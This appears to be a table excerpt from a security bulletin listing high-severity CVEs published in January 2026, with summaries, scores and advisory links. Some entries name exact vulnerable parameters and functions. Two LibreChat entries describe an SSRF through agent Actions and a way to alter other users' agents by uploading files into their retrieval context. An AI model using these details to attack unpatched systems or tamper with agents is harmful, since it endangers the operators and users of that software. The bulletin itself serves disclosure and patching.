| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. In Coolify versions prior to and including v4.0.0-beta.434, low privileged users are able to see the private key of the root user on the Coolify instance. This allows them to ssh to the server and authenticate as root user, using the private key. As of time of publication, it is unclear if a patch is available. | 2026-01-05 | 10 | CVE-2025-64420 | https://github.com/coollabsio/coolify/security/advisories/GHSA-qwxj-qch7-whpc |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.445, parameters coming from docker-compose.yaml are not sanitized when used in commands. If a victim user creates an application from an attacker repository (using build pack "docker compose"), the attacker can execute commands on the Coolify instance as root. Version 4.0.0-beta.445 fixes the issue. | 2026-01-05 | 9.7 | CVE-2025-64419 | https://github.com/coollabsio/coolify/security/advisories/GHSA-234r-xrrg-m8f3 https://github.com/coollabsio/coolify/commit/f86ccfaa9af572a5487da8ea46b0a125a4854cf6 |
| coreruleset--coreruleset | The OWASP core rule set (CRS) is a set of generic attack detection rules for use with compatible web application firewalls. Prior to versions 4.22.0 and 3.3.8, the current rule 922110 has a bug when processing multipart requests with multiple parts. When the first rule in a chain iterates over a collection (like `MULTIPART_PART_HEADERS`), the capture variables (`TX:0`, `TX:1`) get overwritten with each iteration. Only the last captured value is available to the chained rule, which means malicious charsets in earlier parts can be missed if a later part has a legitimate charset. Versions 4.22.0 and 3.3.8 patch the issue. | 2026-01-08 | 9.3 | CVE-2026-21876 | https://github.com/coreruleset/coreruleset/security/advisories/GHSA-36fv-25j3-r2c5 https://github.com/coreruleset/coreruleset/commit/80d80473abf71bd49bf6d3c1ab221e3c74e4eb83 https://github.com/coreruleset/coreruleset/commit/9917985de09a6cf38b3261faf9105e909d67a7d6 https://github.com/coreruleset/coreruleset/releases/tag/v3.3.8 https://github.com/coreruleset/coreruleset/releases/tag/v4.22.0 |
| Corourke--iPhone Webclip Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Corourke iPhone Webclip Manager allows Stored XSS.This issue affects iPhone Webclip Manager: from n/a through 0.5. | 2026-01-05 | 7.1 | CVE-2024-53735 | https://vdp.patchstack.com/database/wordpress/plugin/iphone-webclip-manager/vulnerability/wordpress-iphone-webclip-manager-plugin-0-5-csrf-to-stored-xss-vulnerability?_s_id=cve |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 is prone to a server-side request forgery (SSRF) vulnerability due to missing restrictions of the Actions feature in the default configuration. LibreChat enables users to configure agents with predefined instructions and actions that can interact with remote services via OpenAPI specifications, supporting various HTTP methods, parameters, and authentication methods including custom headers. By default, there are no restrictions on accessible services, which means agents can also access internal components like the RAG API included in the default Docker Compose setup. This issue is fixed in version 0.8.1-rc2. | 2026-01-07 | 9.1 | CVE-2025-69222 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-rgjq-4q58-m3q8 https://github.com/danny-avila/LibreChat/commit/3b41e392ba5c0d603c1737d8582875e04eaa6e02 https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2 |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control for file uploads to an agents file context and file search. An authenticated attacker with access to the agent ID can change the behavior of arbitrary agents by uploading new files to the file context or file search, even if they have no permissions for this agent. This issue is fixed in version 0.8.2-rc2. | 2026-01-07 | 7.1 | CVE-2025-69220 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-xcmf-rpmh-hg59 https://github.com/danny-avila/LibreChat/commit/4b9c6ab1cb9de626736de700c7981f38be08d237 https://cwe.mitre.org/data/definitions/284.html https://cwe.mitre.org/data/definitions/862.html https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2 https://owasp.org/Top10/A01_2021-Broken_Access_Control https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema.html https://raw.githubusercontent.com/OWASP/ASVS/v5.0.0/5.0/OWASP_Application_Security_Verification_Standard_5.0.0_en.pdf |
| Dasinfomedia--WPCHURCH | Incorrect Privilege Assignment vulnerability in Dasinfomedia WPCHURCH allows Privilege Escalation.This issue affects WPCHURCH: from n/a through 2.7.0. | 2026-01-07 | 8.8 | CVE-2025-31643 | https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-2-7-0-privilege-escalation-vulnerability?_s_id=cve |
| Dasinfomedia--WPCHURCH | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dasinfomedia WPCHURCH allows Reflected XSS.This issue affects WPCHURCH: from n/a through 2.7.0. | 2026-01-06 | 7.1 | CVE-2025-31642 | https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-plugin-2-7-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dell--Unisphere for PowerMax | Dell Unisphere for PowerMax, version(s) 9.2.4.x, contain(s) an Improper Restriction of XML External Entity Reference vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access to data and resources outside of the intended sphere of control. | 2026-01-06 | 7.6 | CVE-2025-36589 | https://www.dell.com/support/kbdoc/en-us/000402262/dsa-2025-425-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtual-appliance-dell-unisphere-360-dell-solutions-enabler-virtual-appliance-security-update-for-multiple-vulnerabilities |
| devolo AG--devolo dLAN Cockpit | devolo dLAN Cockpit 4.3.1 contains an unquoted service path vulnerability in the 'DevoloNetworkService' that allows local non-privileged users to potentially execute arbitrary code. Attackers can exploit the insecure service path configuration by inserting malicious code in the system root path to execute with elevated privileges during application startup or system reboot. | 2026-01-07 | 8.4 | CVE-2019-25231 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Devolo Vendor Homepage |
| DevToys-app--DevToys | DevToys is a desktop app for developers. In versions from 2.0.0.0 to before 2.0.9.0, a path traversal vulnerability exists in the DevToys extension installation mechanism. When processing extension packages (NUPKG archives), DevToys does not sufficiently validate file paths contained within the archive. A malicious extension package could include crafted file entries such as ../../target-file, causing the extraction process to write files outside the intended extensions directory. This flaw enables an attacker to overwrite arbitrary files on the user's system with the privileges of the DevToys process. Depending on the environment, this may lead to code execution, configuration tampering, or corruption of application or system files. This issue has been patched in version 2.0.9.0. | 2026-01-10 | 8.8 | CVE-2026-22685 | https://github.com/DevToys-app/DevToys/security/advisories/GHSA-ggxr-h6fm-p2qh https://github.com/DevToys-app/DevToys/pull/1643 https://github.com/DevToys-app/DevToys/commit/02fb7d46d9c663a4ee6ed968baa6a8810405047f |
| Digital zoom studio--DZS Video Gallery | Deserialization of Untrusted Data vulnerability in Digital zoom studio DZS Video Gallery allows Object Injection.This issue affects DZS Video Gallery: from n/a through 12.37. | 2026-01-07 | 9.8 | CVE-2025-47552 | https://patchstack.com/database/wordpress/plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-12-25-php-object-injection-vulnerability?_s_id=cve |
| Digital zoom studio--DZS Video Gallery | Deserialization of Untrusted Data vulnerability in Digital zoom studio DZS Video Gallery allows Object Injection.This issue affects DZS Video Gallery: from n/a through 12.25. | 2026-01-06 | 8.8 | CVE-2025-47553 | https://patchstack.com/database/wordpress/plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-plugin-12-25-php-object-injection-vulnerability?_s_id=cve |
| Digital zoom studio--DZS Video Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Digital zoom studio DZS Video Gallery allows Reflected XSS.This issue affects DZS Video Gallery: from n/a through 12.25. | 2026-01-07 | 7.1 | CVE-2025-32300 | https://patchstack.com/database/wordpress/plugin/dzs-videogallery/vulnerability/wordpress-dzs-video-gallery-plugin-12-25-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| djanym--Optional Email | The Optional Email plugin for WordPress is vulnerable to Privilege Escalation via Account Takeover in all versions up to, and including, 1.3.11. This is due to the plugin not restricting its 'random_password' filter to registration contexts, allowing the filter to affect password reset key generation. This makes it possible for unauthenticated attackers to set a known password reset key when initiating a password reset, reset the password of any user including administrators, and gain access to their accounts. | 2026-01-07 | 9.8 | CVE-2025-15018 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ff4243e9-cf72-40d5-bc7d-204426024a1d?source=cve https://plugins.trac.wordpress.org/browser/optional-email/tags/1.3.11/optional-email.php?marks=44,51#L44 |
| e-plugins--JobBank | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins JobBank allows Reflected XSS.This issue affects JobBank: from n/a through 1.2.2. | 2026-01-06 | 7.1 | CVE-2025-69085 | https://patchstack.com/database/wordpress/plugin/jobbank/vulnerability/wordpress-jobbank-plugin-1-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| eastsidecode--WP Enable WebP | The WP Enable WebP plugin for WordPress is vulnerable to arbitrary file uploads due to improper file type validation in the 'wpse_file_and_ext_webp' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-01-07 | 8.8 | CVE-2025-15158 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fa53c5ee-fe7f-4fb2-baaa-2c1a151d4b2c?source=cve https://plugins.trac.wordpress.org/browser/wp-enable-webp/trunk/wp-enable-webp.php?rev=1998897#L43 |
| Elated-Themes--Frapp | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Frappé allows PHP Local File Inclusion.This issue affects Frappé: from n/a through 1.8. | 2026-01-06 | 8.1 | CVE-2025-69083 | https://patchstack.com/database/wordpress/theme/frappe/vulnerability/wordpress-frappe-theme-1-8-local-file-inclusion-vulnerability?_s_id=cve |
| Extreme Networks--Aerohive HiveOS | Aerohive HiveOS contains a denial of service vulnerability in the NetConfig UI that allows unauthenticated attackers to render the web interface unusable. Attackers can send a crafted HTTP request to the action.php5 script with specific parameters to trigger a 5-minute service disruption. | 2026-01-06 | 7.5 | CVE-2020-36907 | ExploitDB-48441 Extreme Networks Product Homepage HiveOS Product Announcements Zero Science Lab Disclosure (ZSL-2020-5566) NCSC Security Advisory IBM X-Force Vulnerability Exchange Packet Storm Security Exploit Entry VulnCheck Advisory: Extreme Networks Aerohive HiveOS <=11.x 11.x Unauthenticated Remote Denial of Service |
| FIBAR GROUP S.A.--Home Center 3 | FIBARO System Home Center 5.021 contains a remote file inclusion vulnerability in the undocumented proxy API that allows attackers to include arbitrary client-side scripts. Attackers can exploit the 'url' GET parameter to inject malicious JavaScript and potentially hijack user sessions or manipulate page content. | 2026-01-06 | 7.5 | CVE-2020-36905 | ExploitDB-48240 Official Vendor Homepage Zero Science Lab Disclosure (ZSL-2020-5563) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange VulnCheck Advisory: FIBARO System Home Center 5.021 Remote File Inclusion via Proxy API |
| FlagForgeCTF--flagForge | Flag Forge is a Capture The Flag (CTF) platform. Versions 2.3.2 and below have a Regular Expression Denial of Service (ReDoS) vulnerability in the user profile API endpoint (/api/user/[username]). The application constructs a regular expression dynamically using unescaped user input (the username parameter). An attacker can exploit this by sending a specially crafted username containing regex meta-characters (e.g., deeply nested groups or quantifiers), causing the MongoDB regex engine to consume excessive CPU resources. This can lead to Denial of Service for other users. The issue is fixed in version 2.3.3. To workaround this issue, implement a Web Application Firewall (WAF) rule to block requests containing regex meta-characters in the URL path. | 2026-01-08 | 7.5 | CVE-2026-21868 | https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-949h-9824-xmcx |
| FLIR Systems, Inc.--FLIR Thermal Camera F/FC/PT/D | FLIR Thermal Camera F/FC/PT/D firmware version 8.0.0.64 contains hard-coded SSH credentials that cannot be changed through normal camera operations. Attackers can leverage these persistent, unmodifiable credentials to gain unauthorized remote access to the thermal camera system. | 2026-01-07 | 7.5 | CVE-2017-20214 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42787 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| FLIR Systems, Inc.--FLIR Thermal Camera F/FC/PT/D Stream | FLIR Thermal Camera F/FC/PT/D Stream firmware version 8.0.0.64 contains an unauthenticated vulnerability that allows remote attackers to access live camera streams without credentials. Attackers can exploit the vulnerability to view unauthorized thermal camera video feeds across multiple camera series without requiring any authentication. | 2026-01-07 | 7.5 | CVE-2017-20213 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42789 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| FLIR Systems, Inc.--FLIR Thermal Camera FC-S/PT | FLIR Thermal Camera FC-S/PT firmware version 8.0.0.64 contains an authenticated OS command injection vulnerability that allows attackers to execute shell commands with root privileges. Authenticated attackers can inject arbitrary shell commands through unvalidated input parameters to gain complete control of the thermal camera system. | 2026-01-07 | 8.8 | CVE-2017-20215 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42788 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| FLIR Systems, Inc.--FLIR Thermal Camera PT-Series | FLIR Thermal Camera PT-Series firmware version 8.0.0.64 contains multiple unauthenticated remote command injection vulnerabilities in the controllerFlirSystem.php script. Attackers can execute arbitrary system commands as root by exploiting unsanitized POST parameters in the execFlirSystem() function through shell_exec() calls. Exploitation evidence was observed by the Shadowserver Foundation on 2026-01-06 (UTC). | 2026-01-07 | 9.8 | CVE-2017-20216 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 42785 Packet Storm Security Exploit Archive CXSecurity Vulnerability Listing Archived FLIR Security Advisory |
| frappe--frappe | Frappe is a full-stack web application framework. Versions 14.99.5 and below and 15.0.0 through 15.80.1 include requests that are vulnerable to path traversal attacks. Arbitrary files from the server could be retrieved due to a lack of proper sanitization on some requests. This issue is fixed in versions 14.99.6 and 15.88.1. To workaround, changing the setup to use a reverse proxy is recommended. | 2026-01-05 | 7.5 | CVE-2025-68953 | https://github.com/frappe/frappe/security/advisories/GHSA-xj39-3g4p-f46v https://github.com/frappe/frappe/commit/3867fb112c3f7be1a863e40f19e9235719f784fb https://github.com/frappe/frappe/commit/959efd6a498cfaeaf7d4e0ab6cca78c36192d34d |
| Frenify--Arlo | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frenify Arlo arlo allows Reflected XSS.This issue affects Arlo: from n/a through 6.0.3. | 2026-01-07 | 7.1 | CVE-2025-69082 | https://patchstack.com/database/wordpress/theme/arlo/vulnerability/wordpress-arlo-theme-6-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| fsylum--FS Registration Password | The FS Registration Password plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.1. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2026-01-06 | 9.8 | CVE-2025-15001 | https://www.wordfence.com/threat-intel/vulnerabilities/id/22351b90-fc34-44ce-9241-4a0f01eb7b1c?source=cve https://plugins.trac.wordpress.org/browser/registration-password/tags/1.0.1/src/WP/Auth.php https://plugins.trac.wordpress.org/changeset/3431651/registration-password |
| G5Theme--Handmade Framework | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in G5Theme Handmade Framework allows PHP Local File Inclusion.This issue affects Handmade Framework: from n/a through 3.9. | 2026-01-08 | 7.5 | CVE-2026-22521 | https://patchstack.com/database/wordpress/plugin/handmade-framework/vulnerability/wordpress-handmade-framework-plugin-3-9-local-file-inclusion-vulnerability?_s_id=cve |
| ggml-org--llama.cpp | llama.cpp is an inference of several LLM models in C/C++. In commits 55d4206c8 and prior, the n_discard parameter is parsed directly from JSON input in the llama.cpp server's completion endpoints without validation to ensure it's non-negative. When a negative value is supplied and the context fills up, llama_memory_seq_rm/add receives a reversed range and negative offset, causing out-of-bounds memory writes in the token evaluation loop. This deterministic memory corruption can crash the process or enable remote code execution (RCE). There is no fix at the time of publication. | 2026-01-07 | 8.8 | CVE-2026-21869 | https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-8947-pfff-2f3c |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an unauthenticated user to execute arbitrary code in the context of an authenticated user's browser by convincing the legitimate user to visit a specially crafted webpage. | 2026-01-09 | 8 | CVE-2025-13761 | GitLab Issue #582237 HackerOne Bug Bounty Report #3441368 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2.2 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to achieve stored cross-site scripting by exploiting GitLab Flavored Markdown. | 2026-01-09 | 8.7 | CVE-2025-9222 | GitLab Issue #562561 HackerOne Bug Bounty Report #3297483 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.4 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to access and utilize AI model settings from unauthorized namespaces by manipulating namespace identifiers in API requests. | 2026-01-09 | 7.1 | CVE-2025-13772 | GitLab Issue #581268 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| greenshot--greenshot | Greenshot is an open source Windows screenshot utility. Versions 1.3.310 and below arvulnerable to OS Command Injection through unsanitized filename processing. The FormatArguments method in ExternalCommandDestination.cs:269 uses string.Format() to insert user-controlled filenames directly into shell commands without sanitization, allowing attackers to execute arbitrary commands by crafting malicious filenames containing shell metacharacters. This issue is fixed in version 1.3.311. | 2026-01-08 | 7.8 | CVE-2026-22035 | https://github.com/greenshot/greenshot/security/advisories/GHSA-7hvw-q8q5-gpmj https://github.com/greenshot/greenshot/commit/5dedd5c9f0a9896fa0af1d4980d875a48bf432cb https://github.com/greenshot/greenshot/releases/tag/v1.3.311 |
| GT3 themes--Photo Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3 themes Photo Gallery allows Reflected XSS.This issue affects Photo Gallery: from n/a through 2.7.7.26. | 2026-01-06 | 7.1 | CVE-2025-69084 | https://patchstack.com/database/wordpress/plugin/gt3-photo-video-gallery/vulnerability/wordpress-photo-gallery-plugin-2-7-7-26-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Guangzhou V--V-SOL GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform v2.03 contains an open redirect vulnerability in the script that allows attackers to manipulate the 'parent' GET parameter. Attackers can craft malicious links that redirect logged-in users to arbitrary websites by exploiting improper input validation in the redirect mechanism. | 2026-01-07 | 9.8 | CVE-2019-25282 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry VSOL Vendor Homepage |
| Guangzhou Yeroo Tech Co., Ltd.--iDS6 DSSPro Digital Signage System | iDS6 DSSPro Digital Signage System 6.2 contains a sensitive information disclosure vulnerability that allows remote attackers to intercept authentication credentials through cleartext cookie transmission. Attackers can exploit the autoSave feature to capture user passwords during man-in-the-middle attacks on HTTP communications. | 2026-01-06 | 7.5 | CVE-2020-36917 | Zero Science Lab Disclosure (ZSL-2020-5605) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry Archived Yeroo Tech Vendor Homepage VulnCheck Advisory: iDS6 DSSPro Digital Signage System 6.2 Cleartext Password Disclosure via Cookie |
| haxtheweb--issues | HAX CMS helps manage microsite universe with PHP or NodeJs backends. In versions 11.0.6 to before 25.0.0, HAX CMS is vulnerable to stored XSS, which could lead to account takeover. This issue has been patched in version 25.0.0. | 2026-01-10 | 8.1 | CVE-2026-22704 | https://github.com/haxtheweb/issues/security/advisories/GHSA-3fm2-xfq7-7778 https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v25.0.0 |
| IceWhaleTech--ZimaOS | ZimaOS is a fork of CasaOS, an operating system for Zima devices and x86-64 systems with UEFI. In versions up to and including 1.5.0, the application checks the validity of the username but appears to skip, misinterpret, or incorrectly validate the password when the provided username matches a known system service account. The application's login function fails to properly handle the password validation result for these users, effectively granting authenticated access to anyone who knows one of these common usernames and provides any password. As of time of publication, no known patched versions are available. | 2026-01-08 | 9.4 | CVE-2026-21891 | https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4 |
| Infility--Infility Global | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Infility Infility Global allows SQL Injection.This issue affects Infility Global: from n/a through 2.14.48. | 2026-01-05 | 9.3 | CVE-2025-68865 | https://vdp.patchstack.com/database/wordpress/plugin/infility-global/vulnerability/wordpress-infility-global-plugin-2-14-38-sql-injection-vulnerability?_s_id=cve |
| INIM Electronics s.r.l.--SmartLiving SmartLAN/G/SI | SmartLiving SmartLAN <=6.x contains an authenticated remote command injection vulnerability in the web.cgi binary through the 'par' POST parameter with the 'testemail' module. Attackers can exploit the unsanitized parameter and system() function call to execute arbitrary system commands with root privileges using default credentials. | 2026-01-07 | 8.8 | CVE-2019-25289 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 47765 Packet Storm Security Exploit File CXSecurity Vulnerability Issue IBM X-Force Vulnerability Exchange Entry Inim Vendor Homepage |
| INIM Electronics s.r.l.--Smartliving SmartLAN/G/SI | INIM Electronics Smartliving SmartLAN/G/SI <=6.x contains hard-coded credentials in its Linux distribution image that cannot be changed through normal device operations. Attackers can exploit these persistent credentials to log in and gain unauthorized system access across multiple SmartLiving device models. | 2026-01-07 | 7.5 | CVE-2019-25291 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 47763 Packet Storm Security Exploit File IBM X-Force Vulnerability Exchange Entry INIM Vendor Homepage |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below contain a Use After Free vulnerability in the CIccXform::Create() function, where it deletes the hint. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 9.8 | CVE-2026-21675 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wcwx-794g-g78f https://github.com/InternationalColorConsortium/iccDEV/issues/182 https://github.com/InternationalColorConsortium/iccDEV/commit/510baf58fa48e00ebbb5dd577f0db4af8876bb31 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are prone to have Undefined Behavior (UB) and Out of Memory errors. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 8.8 | CVE-2026-21485 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-chp2-4gv5-2432 https://github.com/InternationalColorConsortium/iccDEV/issues/340 https://github.com/InternationalColorConsortium/iccDEV/commit/c136aac51d25cbb4d9db63f071edad4f088843df |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have a Heap-based Buffer Overflow in its CIccMBB::Validate function which checks tag data validity. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 8.8 | CVE-2026-21676 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-j5vv-p2hv-c392 https://github.com/InternationalColorConsortium/iccDEV/issues/215 https://github.com/InternationalColorConsortium/iccDEV/commit/e4c38a67d06073b38d58580b0cfc78ca61005f84 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have Undefined Behavior in its CIccCLUT::Init function which initializes and sets the size of a CLUT. This issue is fixed in version 2.3.1.1. | 2026-01-06 | 8.8 | CVE-2026-21677 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-95w5-jvqf-3994 https://github.com/InternationalColorConsortium/iccDEV/issues/181 https://github.com/InternationalColorConsortium/iccDEV/commit/201125fbda22c8e4ea95800a6b427093fa4b8a22 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to heap-buffer-overflow in CIccLocalizedUnicode::GetText(). This issue has been patched in version 2.3.1.2. | 2026-01-07 | 8.8 | CVE-2026-21679 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-h4wg-473g-p5wc https://github.com/InternationalColorConsortium/iccDEV/issues/328 https://github.com/InternationalColorConsortium/iccDEV/pull/329 https://github.com/InternationalColorConsortium/iccDEV/commit/2eb25ab95f0db7664ec3850390b6f89e302e7039 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a heap-buffer-overflow in `CIccXmlArrayType::ParseText()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21682 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-jq9m-54gr-c56c https://github.com/InternationalColorConsortium/iccDEV/issues/178 https://github.com/InternationalColorConsortium/iccDEV/pull/229 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `icStatusCMM::CIccEvalCompare::EvaluateProfile()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21683 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-f2wp-j3fr-938w https://github.com/InternationalColorConsortium/iccDEV/issues/183 https://github.com/InternationalColorConsortium/iccDEV/pull/228 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `SIccCalcOp::ArgsPushed()` at `IccProfLib/IccMpeCalc.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21688 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-3r2x-j7v3-pg6f https://github.com/InternationalColorConsortium/iccDEV/issues/379 https://github.com/InternationalColorConsortium/iccDEV/pull/422 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `ToXmlCurve()` at `IccXML/IccLibXML/IccMpeXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21692 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7662-mf46-wr88 https://github.com/InternationalColorConsortium/iccDEV/issues/388 https://github.com/InternationalColorConsortium/iccDEV/pull/432 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccSegmentedCurveXml::ToXml()` at `IccXML/IccLibXML/IccMpeXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-21693 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-v3q7-7hw6-6jq8 https://github.com/InternationalColorConsortium/iccDEV/issues/389 https://github.com/InternationalColorConsortium/iccDEV/pull/432 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a heap-buffer-overflow vulnerability in `CIccProfileXml::ParseBasic()` at `IccXML/IccLibXML/IccProfileXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-22046 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7v4q-mhr2-hj7r https://github.com/InternationalColorConsortium/iccDEV/issues/448 https://github.com/InternationalColorConsortium/iccDEV/pull/451 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a heap-buffer-overflow vulnerability in `SIccCalcOp::Describe()` at `IccProfLib/IccMpeCalc.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 8.8 | CVE-2026-22047 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-22q7-8347-79m5 https://github.com/InternationalColorConsortium/iccDEV/issues/454 https://github.com/InternationalColorConsortium/iccDEV/pull/459 |
